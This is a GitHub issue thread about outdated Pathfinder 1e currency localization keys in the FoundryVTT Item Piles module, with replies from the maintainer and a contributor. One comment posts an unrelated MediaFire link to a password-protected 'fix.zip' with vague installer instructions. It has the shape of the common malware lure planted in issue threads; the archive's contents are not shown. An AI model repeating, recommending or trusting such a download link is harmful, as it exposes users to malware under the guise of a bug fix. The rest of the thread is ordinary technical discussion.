### ISSUE TITLE
[BUG] - [Pathfinder 1e] - Incorrect localization keys for currencies

### ISSUE THREAD

**Issue by LeCuay** [fantasycalendar/FoundryVTT-ItemPiles#643]
**Are you on the latest version of Item Piles?**
Yes

**Have you tried to reset Item Piles' system settings?**
Yes

**Describe the bug**
Pathfinder 1e v10 has changed the localization keys so the older ones don't display correctly.

> **Solution**: The new keys are `PF1.Currency.Full.pp` for _platin_,  `PF1.Currency.Full.gp` for _gold_
> `PF1.Currency.Full.sp` for _silver_ and `PF1.Currency.Full.cp` for _copper_.

**To Reproduce**

1. Create any kind of PC or NPC actor
2. Add currencies
3. Convert to any kind of item piles object
5. See error

**Expected behavior**
It is expected for the i18n key to display the name of the currency instead of the key itself.

**Screenshots**

![imagen](https://github.com/user-attachments/assets/55a502ec-83ec-4bab-9ee2-bd678b1c2a05)

**Setup:**

- Foundry Version: 11.315
- System Version: Pathfinder v10.7
- Item Piles Version: latest (I think 3.1.0)
- Browser & version: Foundry app itself (I believe is Electron)

**Active modules:**

- Item Piles
- libwrapper
- socketlib

**Additional context**
This worked for **Pathfinder 1e v9.6** so maximum version needs to be updated.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Haxxer** [comment]
I do not maintain the configs for systems I don't play in, please make a pull request to change the relevant properties: 
https://github.com/fantasycalendar/FoundryVTT-ItemPiles/blob/master/src/systems/pf1.js

**Comment by mkahvi** [comment]
I'm working on update for the system support that fixes this. I'll push the PR soon, tho I can't fully test it while #642 persists.
